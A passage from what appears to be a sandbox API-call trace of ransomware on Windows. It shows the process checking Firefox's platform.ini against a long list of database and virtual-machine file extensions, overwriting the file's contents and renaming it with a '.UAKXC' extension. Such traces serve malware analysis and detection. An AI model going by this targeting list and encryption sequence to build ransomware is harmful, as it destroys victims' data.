pdwDataLen=0x383fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x383fd70*, pdwDataLen=0x383fc8c*=0x200) returned 1 [0139.893] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini")) returned 0x20 [0139.895] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0139.895] GetLastError () returned 0x0 [0139.895] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x383fc88 | out: lpFileSize=0x383fc88*=140) returned 1 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".4dd") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".4dl") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".accdb") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".accdc") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".accde") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".accdr") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".accdt") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".accft") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".adb") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ade") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".adf") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".adp") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".arc") returned 0x0 [0139.895] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ora") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".alf") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ask") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".btr") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".bdf") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".cat") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".cdb") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ckp") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".cma") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".cpd") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dacpac") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dad") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dadiagrams") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".daschema") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".db") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".db-shm") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".db-wal") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".db3") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dbc") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dbf") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dbs") returned 0x0 [0139.896] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dbt") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dbv") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dbx") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dcb") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dct") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dcx") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ddl") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dlis") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dp1") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dqy") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dsk") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dsn") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dtsx") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".dxl") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".eco") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ecx") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".edb") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".epim") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".exb") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fcd") returned 0x0 [0139.897] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fdb") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fic") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fmp") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fmp12") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fmpsl") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fol") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fp3") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fp4") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fp5") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fp7") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fpt") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".frm") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".gdb") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".grdb") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".gwi") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".hdb") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".his") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ib") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".idb") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ihx") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".itdb") returned 0x0 [0139.898] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".itw") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".jet") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".jtx") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".kdb") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".kexi") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".kexic") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".kexis") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".lgc") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".lwx") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".maf") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".maq") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mar") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mas") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mav") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mdb") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mdf") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mpd") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mrg") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mud") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mwb") returned 0x0 [0139.899] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".myd") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ndf") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".nnt") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".nrmlib") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ns2") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ns3") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".ns4") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".nsf") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".nv") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".nv2") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".nwdb") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".nyf") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".odb") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".oqy") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".orx") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".owc") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".p96") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".p97") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".pan") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".pdb") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".pdm") returned 0x0 [0139.900] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".pnz") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".qry") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".qvd") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".rbf") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".rctd") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".rod") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".rodx") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".rpd") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".rsd") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".sas7bdat") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".sbf") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".scx") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".sdb") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".sdc") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".sdf") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".sis") returned 0x0 [0139.901] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".spq") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".sql") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".sqlite") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".sqlite3") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".sqlitedb") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".te") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".temx") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".tmd") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".tps") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".trc") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".trm") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".udb") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".udl") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".usr") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".v12") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vis") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vpd") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vvv") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".wdb") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".wmdb") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".wrk") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".xdb") returned 0x0 [0139.902] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".xld") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".xmlff") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".abcddb") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".abs") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".abx") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".accdw") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".adn") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".db2") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".fm5") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".hjt") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".icg") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".icr") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".kdb") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".lut") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".maw") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mdn") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".mdt") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vdi") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vhd") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vmdk") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".pvm") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vmem") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vmsn") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vmsd") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".nvram") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vmx") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".raw") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".qcow2") returned 0x0 [0139.903] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".subvol") returned 0x0 [0139.904] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".bin") returned 0x0 [0139.904] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vsv") returned 0x0 [0139.904] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".avhd") returned 0x0 [0139.904] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vmrs") returned 0x0 [0139.904] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vhdx") returned 0x0 [0139.904] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".avdx") returned 0x0 [0139.904] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".vmcx") returned 0x0 [0139.904] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpSrch=".iso") returned 0x0 [0139.904] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.904] WriteFile (in: hFile=0x210, lpBuffer=0x383fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x383fc78, lpOverlapped=0x0 | out: lpBuffer=0x383fd70*, lpNumberOfBytesWritten=0x383fc78*=0x20c, lpOverlapped=0x0) returned 1 [0139.905] WriteFile (in: hFile=0x210, lpBuffer=0x383fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x383fc7c, lpOverlapped=0x0 | out: lpBuffer=0x383fc80*, lpNumberOfBytesWritten=0x383fc7c*=0xa, lpOverlapped=0x0) returned 1 [0139.905] SetEndOfFile (hFile=0x210) returned 1 [0139.906] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.906] ReadFile (in: hFile=0x210, lpBuffer=0x4610000, nNumberOfBytesToRead=0x8c, lpNumberOfBytesRead=0x383fc88, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesRead=0x383fc88*=0x8c, lpOverlapped=0x0) returned 1 [0139.906] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xffffff74, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.906] WriteFile (in: hFile=0x210, lpBuffer=0x4610000*, nNumberOfBytesToWrite=0x8c, lpNumberOfBytesWritten=0x383fc44, lpOverlapped=0x0 | out: lpBuffer=0x4610000*, lpNumberOfBytesWritten=0x383fc44*=0x8c, lpOverlapped=0x0) returned 1 [0139.906] CloseHandle (hObject=0x210) returned 1 [0139.911] GetProcessHeap () returned 0xea0000 [0139.911] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef06f0 [0139.911] lstrcpyW (in: lpString1=0xef06f0, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini") returned="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini" [0139.911] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini.UAKXC" [0139.911] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\platform.ini.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\platform.ini.uakxc")) returned 1 [0139.940] GetProcessHeap () returned 0xea0000 [0139.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef06f0 | out: hHeap=0xea0000) returned 1 [0139.940] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeee9c8 | out: hHeap=0xea0000) returned 1 